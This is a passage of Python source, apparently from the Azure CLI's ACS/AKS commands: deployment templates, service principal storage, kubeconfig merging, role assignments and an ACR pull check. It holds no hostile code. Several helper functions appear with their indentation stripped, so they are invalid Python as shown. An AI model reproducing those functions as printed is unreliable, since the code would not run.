    :param agent_vnet_subnet_id: The vnet subnet id for master pool
    :type agent_vnet_subnet_id: str
    :param agent_ports: the ports exposed on the agent pool
    :type agent_ports: list
    :param agent_storage_profile: The storage profile used for agent pool.
    Possible value could be StorageAccount, ManagedDisk.
    :type agent_storage_profile: str
    :param location: Location for VM resources.
    :type location: str
    :param orchestrator_type: The type of orchestrator used to manage the
    applications on the cluster.
    :type orchestrator_type: str or :class:`orchestratorType
    <Default.models.orchestratorType>`
    :param tags: Tags object.
    :type tags: object
    :param windows: If true, the cluster will be built for running Windows container.
    :type windows: bool
    :param admin_password: The administration password for Windows nodes. Only available if --windows=true
    :type admin_password: str
    :param bool raw: returns the direct response alongside the
    deserialized response
    :rtype:
    :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
    instance that returns :class:`DeploymentExtended
    <Default.models.DeploymentExtended>`
    :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
    if raw=true
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Validate the SSH public key up front: it is embedded verbatim in the template.
    if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
        raise CLIError(
            'Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(
            name, resource_group_name, subscription_id)
    rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # if api-version is not specified, or specified in a version not supported
    # override based on location
    if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
        if location in regions_in_preview:
            api_version = "2017-07-01"  # 2017-07-01 supported in the preview locations
        else:
            api_version = "2017-01-31"  # 2017-01-31 applied to other locations
    # Kubernetes needs a service principal to manage Azure resources; create
    # (or reuse) one now. Windows pools are only supported on Kubernetes.
    if orchestrator_type.lower() == 'kubernetes':
        principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
                                                  dns_name_prefix, location, name)
        client_secret = principal_obj.get("client_secret")
        service_principal = principal_obj.get("service_principal")
    elif windows:
        raise CLIError('--windows is only supported for Kubernetes clusters')
    # set location if void
    if not location:
        location = '[resourceGroup().location]'
    # set os_type
    os_type = 'Linux'
    if windows:
        os_type = 'Windows'
    # set agent_ports if void
    if not agent_ports:
        agent_ports = []
    # get windows_profile
    windows_profile = _generate_windows_profile(
        windows, admin_username, admin_password)
    # The resources.properties fields should match with ContainerServices' api model
    master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
                                                        master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                                        master_first_consecutive_static_ip, master_storage_profile)
    agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                                        agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                                        agent_ports, agent_storage_profile)
    outputs = _generate_outputs(name, orchestrator_type, admin_username)
    properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
                                      agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
    # Assemble a single-resource ARM deployment template around the container service.
    resource = {
        "apiVersion": api_version,
        "location": location,
        "type": "Microsoft.ContainerService/containerServices",
        "name": name,
        "tags": tags,
        "properties": properties,
    }
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "resources": [
            resource,
        ],
        "outputs": outputs,
    }
    params = {}
    # The client secret is passed as a secureString template parameter rather
    # than inline, so it is not persisted in the template body.
    if service_principal is not None and client_secret is not None:
        properties["servicePrincipalProfile"] = {
            "clientId": service_principal,
            "secret": "[parameters('clientSecret')]",
        }
        template["parameters"] = {
            "clientSecret": {
                "type": "secureString",
                "metadata": {
                    "description": "The client secret for the service principal"
                }
            }
        }
        params = {
            "clientSecret": {
                "value": client_secret
            }
        }
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            return _invoke_deployment(cmd, resource_group_name, deployment_name,
                                      template, params, validate, no_wait)
        except CloudError as ex:
            retry_exception = ex
            # Only retry on errors consistent with the SPN not having replicated yet.
            if 'is not valid according to the validation procedure' in ex.message or \
               'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
               'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    """Persist the service principal (and secret) for *subscription_id*.

    The entry is merged into the per-user config file, which is rewritten
    with owner-only permissions since it holds a credential.
    """
    entry = {}
    if client_secret:
        entry['client_secret'] = client_secret
    if service_principal:
        entry['service_principal'] = service_principal
    config_path = os.path.join(get_config_dir(), file_name)
    all_principals = load_service_principals(config_path=config_path) or {}
    all_principals[subscription_id] = entry
    # 0o600: the file stores secrets, so restrict it to the owner.
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC
    with os.fdopen(os.open(config_path, flags, 0o600), 'w+') as handle:
        json.dump(all_principals, handle)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
    """Return the stored service principal entry for *subscription_id*, or None."""
    config_path = os.path.join(get_config_dir(), file_name)
    config = load_service_principals(config_path)
    return config.get(subscription_id) if config else None
def load_service_principals(config_path):
    """Parse the stored service principal config; None when missing or unparsable."""
    if not os.path.exists(config_path):
        return None
    fd = os.open(config_path, os.O_RDONLY)
    try:
        with os.fdopen(fd) as handle:
            return shell_safe_json_parse(handle.read())
    except:  # pylint: disable=bare-except
        # Deliberately best-effort: any read/parse failure means "no config".
        return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
                       subscription_id=None):
    """Validate or submit an ARM deployment of *template* with *parameters*.

    When *validate* is true only template validation is performed (the
    template is logged at info level); otherwise the deployment is
    created/updated in incremental mode, honoring *no_wait*.
    """
    DeploymentProperties = cmd.get_models(
        'DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(
        template=template, parameters=parameters, mode='incremental')
    smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
                                  subscription_id=subscription_id).deployments
    Deployment = cmd.get_models(
        'Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    deployment = Deployment(properties=properties)
    if validate:
        logger.info('==== BEGIN TEMPLATE ====')
        logger.info(json.dumps(template, indent=2))
        logger.info('==== END TEMPLATE ====')
        # Newer resource API versions expose validation as a long-running operation.
        if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
            validation_poller = smc.begin_validate(
                resource_group_name, deployment_name, deployment)
            return LongRunningOperation(cmd.cli_ctx)(validation_poller)
        return smc.validate(resource_group_name, deployment_name, deployment)
    return sdk_no_wait(no_wait, smc.begin_create_or_update, resource_group_name, deployment_name, deployment)
def k8s_get_credentials(cmd, client, name, resource_group_name,
                        path=os.path.join(os.path.expanduser(
                            '~'), '.kube', 'config'),
                        ssh_key_file=None,
                        overwrite_existing=False):
    """Fetch kubectl credentials from the cluster master and install them locally.

    :param name: The name of the cluster.
    :type name: str
    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param path: Where to install the kubectl config file
    :type path: str
    :param ssh_key_file: Path to an SSH key file to use
    :type ssh_key_file: str
    """
    cluster_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_get_credentials_internal(name, cluster_info, path,
                                  ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
    """Copy the kubeconfig off the cluster master over scp and merge it into *path*."""
    if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
        raise CLIError(
            'Private key file {} does not exist'.format(ssh_key_file))
    dns_prefix = acs_info.master_profile.dns_prefix  # pylint: disable=no-member
    location = acs_info.location  # pylint: disable=no-member
    user = acs_info.linux_profile.admin_username  # pylint: disable=no-member
    _mkdir_p(os.path.dirname(path))
    # Never clobber an existing file: probe for a free '<path>-<name>-<ix>' name.
    path_candidate = path
    ix = 0
    while os.path.exists(path_candidate):
        ix += 1
        path_candidate = '{}-{}-{}'.format(path, name, ix)
    # TODO: this only works for public cloud, need other casing for national clouds
    host = '{}.{}.cloudapp.azure.com'.format(dns_prefix, location)
    acs_client.secure_copy(user, host, '.kube/config',
                           path_candidate, key_filename=ssh_key_file)
    # If an alternate name was needed, merge it back into the main config.
    if path_candidate != path:
        try:
            merge_kubernetes_configurations(
                path, path_candidate, overwrite_existing)
        except yaml.YAMLError as exc:
            logger.warning(
                'Failed to merge credentials to kube config file: %s', exc)
            logger.warning(
                'The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
    """Load a kubeconfig YAML file, mapping missing-file and parse errors to CLIError."""
    try:
        with open(filename) as stream:
            return yaml.safe_load(stream)
    except (IOError, OSError) as ex:
        # Only a missing file gets the friendly message; other I/O errors propagate.
        if getattr(ex, 'errno', 0) != errno.ENOENT:
            raise
        raise CLIError('{} does not exist'.format(filename))
    except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
        raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
    """Merge the kubeconfig in *addition_file* into *existing_file*.

    Optionally renames the added context to *context_name*. Admin contexts
    get an '-admin' suffix so they don't shadow the user context. After
    writing, warns (does not fail) when the resulting file is not
    owner-only readable/writable.
    """
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    # Validate before dereferencing: previously this None check ran only
    # after `addition` had already been indexed/iterated, so a bad file
    # surfaced as an AttributeError instead of this clear error.
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
        addition['contexts'][0]['name'] = context_name
        addition['contexts'][0]['context']['cluster'] = context_name
        addition['clusters'][0]['name'] = context_name
        addition['current-context'] = context_name
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
    else:
        _handle_merge(existing, addition, 'clusters', replace)
        _handle_merge(existing, addition, 'users', replace)
        _handle_merge(existing, addition, 'contexts', replace)
        existing['current-context'] = addition['current-context']
    # check that ~/.kube/config is only read- and writable by its owner
    if platform.system() != 'Windows':
        existing_file_perms = "{:o}".format(
            stat.S_IMODE(os.lstat(existing_file).st_mode))
        if not existing_file_perms.endswith('600'):
            logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
                           existing_file, existing_file_perms)
    with open(existing_file, 'w+') as stream:
        yaml.safe_dump(existing, stream, default_flow_style=False)
    current_context = addition.get('current-context', 'UNKNOWN')
    msg = 'Merged "{}" as current context in {}'.format(
        current_context, existing_file)
    logger.warning(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
    """
    Fetch the ContainerService object from the Azure REST API.

    :param name: ACS resource name
    :type name: String
    :param resource_group_name: Resource group name
    :type resource_group_name: String
    """
    services_client = cf_container_services(cli_ctx, None)
    return services_client.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
    """Scale the first agent pool of an existing container service."""
    instance = client.get(resource_group_name, container_service_name)
    instance.agent_pool_profiles[0].count = new_agent_count  # pylint: disable=no-member
    # For Kubernetes clusters the service principal must be nulled out,
    # otherwise validation complains about it.
    if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
        instance.service_principal_profile = None
    # Likewise drop the windows profile so validation doesn't demand the
    # admin password again.
    instance.windows_profile = None
    return client.begin_create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
    ''' List Container Services, optionally scoped to one resource group. '''
    if resource_group_name:
        services = client.list_by_resource_group(resource_group_name=resource_group_name)
    else:
        services = client.list()
    return list(services)
def show_service_principal(client, identifier):
    """Resolve *identifier* to an object id and fetch that service principal."""
    return client.get(_resolve_service_principal(client, identifier))
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError(
"service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Register a new AAD application.

    Returns a tuple of (application, 'ocp-aad-session-key' header value) so
    callers can reuse the session key on follow-up graph calls.  Raises
    CLIError with setup guidance when the signed-in user lacks directory
    write permission.
    """
    from azure.graphrbac.models import GraphErrorException
    # Builds either password credentials or key credentials (never both).
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
                                                   display_name=display_name,
                                                   identifier_uris=identifier_uris,
                                                   homepage=homepage,
                                                   reply_urls=reply_urls,
                                                   key_credentials=key_creds,
                                                   password_credentials=password_creds,
                                                   required_resource_access=required_resource_accesses)
    try:
        # raw=True exposes the HTTP response so the session-key header can be read.
        result = client.create(app_create_param, raw=True)
        return result.output, result.response.headers["ocp-aad-session-key"]
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
                       available_to_other_tenants=False, password=None, reply_urls=None,
                       key_value=None, key_type=None, key_usage=None, start_date=None,
                       end_date=None, required_resource_accesses=None):
    """Update credentials and reply URLs of an existing AAD application.

    NOTE(review): display_name, homepage, identifier_uris,
    available_to_other_tenants and required_resource_accesses are accepted
    but never used below — presumably the signature mirrors
    create_application for CLI argument wiring; confirm before removing.
    """
    from azure.graphrbac.models import GraphErrorException
    password_creds, key_creds = _build_application_creds(password, key_value, key_type,
                                                         key_usage, start_date, end_date)
    try:
        # Each piece is patched independently; untouched settings are preserved.
        if key_creds:
            client.update_key_credentials(object_id, key_creds)
        if password_creds:
            client.update_password_credentials(object_id, password_creds)
        if reply_urls:
            client.patch(object_id, ApplicationUpdateParameters(
                reply_urls=reply_urls))
        return
    except GraphErrorException as ex:
        if 'insufficient privileges' in str(ex).lower():
            link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal'  # pylint: disable=line-too-long
            raise CLIError("Directory permission is needed for the current user to register the application. "
                           "For how to configure, please refer '{}'. Original error: {}".format(link, ex))
        raise
def _build_application_creds(password=None, key_value=None, key_type=None,
                             key_usage=None, start_date=None, end_date=None):
    """Build (password_creds, key_creds) for an AAD application.

    At most one of *password* / *key_value* may be given (CLIError
    otherwise); the unused side of the returned tuple is None. Dates may be
    datetimes or parseable strings and default to a one-year validity
    window starting now.
    """
    if password and key_value:
        raise CLIError(
            'specify either --password or --key-value, but not both.')
    if not start_date:
        start_date = datetime.datetime.utcnow()
    elif isinstance(start_date, str):
        start_date = dateutil.parser.parse(start_date)
    if not end_date:
        # Default credential lifetime: one year from the start date.
        end_date = start_date + relativedelta(years=1)
    elif isinstance(end_date, str):
        end_date = dateutil.parser.parse(end_date)
    key_type = key_type or 'AsymmetricX509Cert'
    key_usage = key_usage or 'Verify'
    password_creds = None
    key_creds = None
    if password:
        password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
                                             key_id=str(uuid.uuid4()), value=password)]
    elif key_value:
        key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
                                   key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
    return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
    """Create a service principal for an application.

    *identifier* may be an app id (GUID), an identifier URI, or an
    application object id; it is resolved to an app id unless
    *resolve_app* is False.
    """
    if rbac_client is None:
        rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not resolve_app:
        app_id = identifier
    else:
        try:
            uuid.UUID(identifier)
            # Looks like a GUID: try it as an appId first.
            matches = list(rbac_client.applications.list(
                filter="appId eq '{}'".format(identifier)))
        except ValueError:
            matches = list(rbac_client.applications.list(
                filter="identifierUris/any(s:s eq '{}')".format(identifier)))
        if not matches:  # assume we get an object id
            matches = [rbac_client.applications.get(identifier)]
        app_id = matches[0].app_id
    return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cmd, role, assignee, is_service_principal, resource_group_name=None, scope=None):
    """Assign *role* to *assignee* at *scope* (or resource group / subscription)."""
    return _create_role_assignment(cmd, role, assignee,
                                   resource_group_name=resource_group_name,
                                   scope=scope,
                                   resolve_assignee=is_service_principal)
def _create_role_assignment(cmd, role, assignee,
                            resource_group_name=None, scope=None, resolve_assignee=True):
    """Create a role assignment for *assignee* at the computed scope.

    *role* may be a role name or a role definition id. When
    *resolve_assignee* is true, *assignee* is resolved through the graph
    API (service principal client id -> object id); otherwise it is used
    as-is (e.g. an MSI object id). Raises CLIError when the assignee
    cannot be resolved.
    """
    from azure.cli.core.profiles import get_sdk
    factory = get_auth_management_client(cmd.cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    scope = _build_role_scope(
        resource_group_name, scope, assignments_client.config.subscription_id)
    role_id = _resolve_role_id(role, scope, definitions_client)
    # If the cluster has service principal resolve the service principal client id to get the object id,
    # if not use MSI object id.
    object_id = assignee
    if resolve_assignee:
        from azure.graphrbac.models import GraphErrorException
        error_msg = "Failed to resolve service principal object ID: "
        try:
            object_id = _resolve_object_id(cmd.cli_ctx, assignee)
        except GraphErrorException as ex:
            # Fold any HTTP status code / reason into the error message so
            # the user sees why graph resolution failed.
            if ex.response is not None:
                error_code = getattr(ex.response, "status_code", None)
                error_reason = getattr(ex.response, "reason", None)
                internal_error = ""
                if error_code:
                    internal_error += str(error_code)
                if error_reason:
                    if internal_error:
                        internal_error += " - "
                    internal_error += str(error_reason)
                if internal_error:
                    error_msg += "({}) ".format(internal_error)
            error_msg += ex.message
            # this should be UserFault or ServiceError, but it is meaningless to distinguish them here
            raise CLIError(error_msg)
        except Exception as ex:  # pylint: disable=bare-except
            raise CLIError(error_msg + str(ex))
    assignment_name = uuid.uuid4()
    custom_headers = None
    # Pick the parameter model matching the authorization API version in use.
    RoleAssignmentCreateParameters = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                             'RoleAssignmentCreateParameters', mod='models',
                                             operation_group='role_assignments')
    if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
        parameters = RoleAssignmentCreateParameters(
            role_definition_id=role_id, principal_id=object_id)
        return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
    RoleAssignmentProperties = get_sdk(cmd.cli_ctx, ResourceType.MGMT_AUTHORIZATION,
                                       'RoleAssignmentProperties', mod='models',
                                       operation_group='role_assignments')
    properties = RoleAssignmentProperties(role_definition_id=role_id, principal_id=object_id)
    return assignments_client.create(scope, assignment_name, properties, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
    """Resolve *assignee* (UPN, SPN or object id) to a graph object id."""
    client = get_graph_rbac_management_client(cli_ctx)
    result = None
    if '@' in assignee:  # looks like a user principal name
        result = list(client.users.list(
            filter="userPrincipalName eq '{}'".format(assignee)))
    if not result:
        result = list(client.service_principals.list(
            filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
    if not result:  # assume an object id, let us verify it
        result = _get_object_stubs(client, [assignee])
    # 2+ matches should never happen, so we only check 'no match' here
    if not result:
        raise CLIError(
            "No matches in graph database for '{}'".format(assignee))
    return result[0].object_id
def _get_object_stubs(graph_client, assignees):
    """Fetch directory object stubs for the given object ids."""
    query = GetObjectsParameters(include_directory_object_references=True,
                                 object_ids=assignees)
    return list(graph_client.objects.get_objects_by_object_ids(query))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cmd, scope):
    """Return True when a Network Contributor assignment already exists at *scope*."""
    # Well-known built-in role definition id for "Network Contributor".
    network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
    assignments_client = get_auth_management_client(cmd.cli_ctx, scope).role_assignments
    if cmd.supported_api_version(min_api='2018-01-01-preview', resource_type=ResourceType.MGMT_AUTHORIZATION):
        return any(
            assignment.scope == scope and
            assignment.role_definition_id.endswith(network_contributor_role_id)
            for assignment in assignments_client.list_for_scope(scope=scope, filter='atScope()'))
    return False
def aks_check_acr(cmd, client, resource_group_name, name, acr):
    """Validate that the cluster can pull images from *acr* by running the
    'canipull' diagnostic pod inside the cluster.

    Requires kubectl on PATH. Fetches user credentials into a temp kubeconfig,
    checks the kubectl client/server versions, then launches the canipull pod
    via ``kubectl run``. Returns the pod output only when the
    "test_aks_create_attach_acr" test hook requests it; otherwise None.

    :raises ValidationError: kubectl missing or its version cannot be determined.
    :raises AzureInternalError: the canipull pod failed or produced no output.
    """
    if not which("kubectl"):
        raise ValidationError("Can not find kubectl executable in PATH")
    return_msg = None
    fd, browse_path = tempfile.mkstemp()
    try:
        aks_get_credentials(
            cmd, client, resource_group_name, name, admin=False, path=browse_path
        )
        # Get kubectl minor version
        kubectl_minor_version = -1
        try:
            # NOTE: use a dedicated local here — the original reassigned 'cmd',
            # shadowing the CLI command-context parameter of this function.
            version_cmd = f"kubectl version -o json --kubeconfig {browse_path}"
            output = subprocess.Popen(version_cmd, shell=True, stdout=subprocess.PIPE)
            jsonS, _ = output.communicate()
            kubectl_version = json.loads(jsonS)
            # Remove any non-numeric characters like + from minor version
            kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
            kubectl_server_minor_version = int(
                kubectl_version["serverVersion"]["minor"])
            kubectl_server_patch = int(
                kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
            if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
                logger.warning(
                    "There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
                    "ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for "
                    "more information."
                )
        except subprocess.CalledProcessError as err:
            raise ValidationError(
                "Could not find kubectl minor version: {}".format(err))
        if kubectl_minor_version == -1:
            raise ValidationError("Failed to get kubectl version")
        podName = "canipull-" + str(uuid.uuid4())
        # pod spec overrides: run as root on the host network, mounting the
        # node's /etc/kubernetes (azure.json) and CA certs so canipull can
        # authenticate against ACR using the kubelet identity.
        overrides = {
            "spec": {
                "restartPolicy": "Never",
                "hostNetwork": True,
                "containers": [
                    {
                        "securityContext": {"runAsUser": 0},
                        "name": podName,
                        "image": CONST_CANIPULL_IMAGE,
                        "args": ["-v6", acr],
                        "stdin": True,
                        "stdinOnce": True,
                        "tty": True,
                        "volumeMounts": [
                            {"name": "azurejson", "mountPath": "/etc/kubernetes"},
                            {"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
                        ],
                    }
                ],
                "tolerations": [
                    {"key": "CriticalAddonsOnly", "operator": "Exists"},
                    {"effect": "NoExecute", "operator": "Exists"},
                ],
                "volumes": [
                    {"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
                    {"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
                ],
                "nodeSelector": {"kubernetes.io/os": "linux"},
            }
        }
        try:
            canipull_cmd = [
                "kubectl",
                "run",
                "--kubeconfig",
                browse_path,
                "--rm",
                "--quiet",
                "--image",
                CONST_CANIPULL_IMAGE,
                "--overrides",
                json.dumps(overrides),
                "-it",
                podName,
                "--namespace=default",
            ]
            # Support kubectl versions < 1.18
            if kubectl_minor_version < 18:
                canipull_cmd += ["--generator=run-pod/v1"]
            output = subprocess.check_output(
                canipull_cmd,
                universal_newlines=True,
                stderr=subprocess.STDOUT,
            )
        except subprocess.CalledProcessError as err:
            raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
        if output:
            print(output)
            # only return the output in test case "test_aks_create_attach_acr"
            test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
            if test_hook_data:
                test_configs = test_hook_data.get("configs", None)
                if test_configs and test_configs.get("returnOutput", False):
                    return_msg = output
        else:
            raise AzureInternalError("Failed to check the ACR.")
    finally:
        os.close(fd)
    return return_msg
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
    cmd,
    client,
    resource_group_name,
    name,
    disable_browser=False,
    listen_address="127.0.0.1",
    listen_port="8001",
    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
    """Open the cluster's Kubernetes resources view or the legacy kube-dashboard.

    For clusters on Kubernetes >= 1.19.0, or whenever the kube-dashboard addon
    is disabled, the user is sent to the Azure portal resources view. Otherwise
    the dashboard pod and port are located in kube-system and exposed through a
    local ``kubectl proxy`` (a browser tab is opened unless *disable_browser*).
    Returns a status message consumed by tests, or None.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=resource_type,
                                                operation_group='managed_clusters')
    # verify the kube-dashboard addon was not disabled
    instance = client.get(resource_group_name, name)
    addon_profiles = instance.addon_profiles or {}
    # addon name is case insensitive
    addon_profile = next((addon_profiles[k] for k in addon_profiles
                          if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
                         ManagedClusterAddonProfile(enabled=False))
    return_msg = None
    # open portal view if addon is not enabled or k8s version >= 1.19.0
    if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
        subscription_id = get_subscription_id(cmd.cli_ctx)
        dashboardURL = (
            # Azure Portal URL (https://portal.azure.com for public cloud)
            cmd.cli_ctx.cloud.endpoints.portal +
            ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
             '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
        )
        if in_cloud_console():
            logger.warning(
                'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
        else:
            logger.warning('Kubernetes resources view on %s', dashboardURL)
            return_msg = "Kubernetes resources view on {}".format(dashboardURL)
        if not disable_browser:
            webbrowser.open_new_tab(dashboardURL)
        return return_msg
    # otherwise open the kube-dashboard addon
    if not which('kubectl'):
        raise FileOperationError('Can not find kubectl executable in PATH')
    fd, browse_path = tempfile.mkstemp()
    try:
        aks_get_credentials(cmd, client, resource_group_name,
                            name, admin=False, path=browse_path)
        # find the dashboard pod's name
        try:
            dashboard_pod = subprocess.check_output(
                [
                    "kubectl",
                    "get",
                    "pods",
                    "--kubeconfig",
                    browse_path,
                    "--namespace",
                    "kube-system",
                    "--output",
                    "name",
                    "--selector",
                    "k8s-app=kubernetes-dashboard",
                ],
                universal_newlines=True,
                stderr=subprocess.STDOUT,
            )
        except subprocess.CalledProcessError as err:
